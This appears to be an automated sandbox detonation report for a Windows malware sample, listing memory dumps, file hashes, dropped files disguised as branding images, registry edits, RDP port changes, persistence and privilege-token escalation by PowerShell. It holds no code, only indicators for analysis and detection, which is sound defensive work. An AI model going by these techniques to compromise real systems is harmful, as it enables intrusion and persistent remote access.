memory/1808-87-0x000000001B830000-0x000000001BB2F000-memory.dmp

memory/1508-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bb5af8bc520a0de48105fc923b6a1d84
SHA1 0809d53f50f67e47933b5075c45d95228fdf828c
SHA256 5fc188ee52b3efa71cd4385e987ce5ffd62b4e0b0e6ab3e389c2e7bc1d9a5ab3
SHA512 fb02e2d24d52b48487426556700c74cf4782aac50b01c8316733e82f9450c6cc0fd722f59e958fa4ac992d05a332722d52319628242949386eb59f7ee544984a

memory/1808-91-0x000000000276C000-0x000000000278B000-memory.dmp

memory/1508-92-0x000007FEEB3B0000-0x000007FEEBF0D000-memory.dmp

memory/1508-94-0x0000000002630000-0x0000000002632000-memory.dmp

memory/1508-93-0x0000000002634000-0x0000000002637000-memory.dmp

memory/1508-95-0x0000000002632000-0x0000000002634000-memory.dmp

memory/1508-96-0x0000000002637000-0x0000000002638000-memory.dmp

memory/1508-97-0x000000001B920000-0x000000001BC1F000-memory.dmp

memory/1960-98-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bb5af8bc520a0de48105fc923b6a1d84
SHA1 0809d53f50f67e47933b5075c45d95228fdf828c
SHA256 5fc188ee52b3efa71cd4385e987ce5ffd62b4e0b0e6ab3e389c2e7bc1d9a5ab3
SHA512 fb02e2d24d52b48487426556700c74cf4782aac50b01c8316733e82f9450c6cc0fd722f59e958fa4ac992d05a332722d52319628242949386eb59f7ee544984a

memory/1508-100-0x000000000263C000-0x000000000265B000-memory.dmp

memory/1960-102-0x000007FEEB3B0000-0x000007FEEBF0D000-memory.dmp

memory/1960-103-0x000000001B8D0000-0x000000001BBCF000-memory.dmp

memory/1960-104-0x00000000026F0000-0x00000000026F2000-memory.dmp

memory/1960-105-0x00000000026F2000-0x00000000026F4000-memory.dmp

memory/1960-106-0x00000000026F4000-0x00000000026F7000-memory.dmp

memory/1960-107-0x00000000026F7000-0x00000000026F8000-memory.dmp

memory/1960-108-0x00000000026FC000-0x000000000271B000-memory.dmp

memory/1564-109-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1560-111-0x0000000000000000-mapping.dmp

memory/856-112-0x0000000000000000-mapping.dmp

memory/1856-113-0x0000000000000000-mapping.dmp

memory/612-114-0x0000000000000000-mapping.dmp

memory/1608-115-0x0000000000000000-mapping.dmp

memory/1980-116-0x0000000000000000-mapping.dmp

memory/1088-117-0x0000000000000000-mapping.dmp

memory/392-118-0x0000000000000000-mapping.dmp

memory/812-119-0x0000000000000000-mapping.dmp

memory/1820-120-0x0000000000000000-mapping.dmp

memory/1400-121-0x0000000000000000-mapping.dmp

memory/732-122-0x0000000000000000-mapping.dmp

memory/1636-123-0x0000000000000000-mapping.dmp

memory/556-124-0x0000000000000000-mapping.dmp

memory/1556-125-0x0000000000000000-mapping.dmp

memory/1740-126-0x0000000000000000-mapping.dmp

memory/892-127-0x0000000000000000-mapping.dmp

memory/1948-128-0x0000000000000000-mapping.dmp

memory/944-129-0x0000000000000000-mapping.dmp

memory/1968-130-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 02de1d05ec7c49607d0469e7731760c6
SHA1 39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512 a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

\Windows\Branding\mediasvc.png

MD5 a82cc23d45b8e1de9897fa40dbfebecb
SHA1 16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256 300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512 b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a

memory/1384-133-0x0000000000000000-mapping.dmp

memory/1260-134-0x0000000000000000-mapping.dmp

memory/1352-135-0x0000000000000000-mapping.dmp

memory/784-136-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/612-138-0x0000000000000000-mapping.dmp

memory/1984-139-0x0000000000000000-mapping.dmp

memory/1812-140-0x0000000000000000-mapping.dmp

memory/1412-141-0x0000000000000000-mapping.dmp

memory/1400-142-0x0000000000000000-mapping.dmp

memory/1532-143-0x0000000000000000-mapping.dmp

memory/1728-144-0x0000000000000000-mapping.dmp

memory/1604-145-0x0000000000000000-mapping.dmp

memory/1112-146-0x0000000000000000-mapping.dmp

memory/1252-147-0x0000000000000000-mapping.dmp

memory/1344-148-0x0000000000000000-mapping.dmp

memory/1812-149-0x0000000000000000-mapping.dmp

memory/1812-151-0x000007FEEB3B0000-0x000007FEEBF0D000-memory.dmp

memory/1812-152-0x0000000001340000-0x0000000001342000-memory.dmp

memory/1812-153-0x0000000001342000-0x0000000001344000-memory.dmp

memory/1812-154-0x0000000001344000-0x0000000001347000-memory.dmp

memory/1812-155-0x000000000134B000-0x000000000136A000-memory.dmp

memory/1516-156-0x0000000000000000-mapping.dmp

memory/1528-157-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-24 19:05

Reported

2021-09-24 19:10

Platform

win10-en-20210920

Max time kernel

115s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGICB3.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID92.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID52.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_sduftrvg.eqj.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zm5tuu4o.kou.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID02.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID32.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
